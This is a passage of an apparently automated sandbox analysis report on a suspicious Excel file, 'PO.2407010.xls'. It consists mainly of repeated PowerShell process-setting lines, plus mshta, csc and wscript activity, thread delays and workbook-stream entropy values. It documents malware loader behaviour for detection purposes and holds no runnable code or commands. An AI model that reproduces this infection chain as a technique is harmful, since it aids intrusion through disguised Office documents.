          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: PO.2407010.xlsStream path 'Workbook' entropy: 7.9991441739 (max. 8.0)
          Source: 20430000.0.drStream path 'Workbook' entropy: 7.9991944633 (max. 8.0)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5832Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1332Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5652Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1557Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1645Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 918Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1881Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7975Jump to behavior
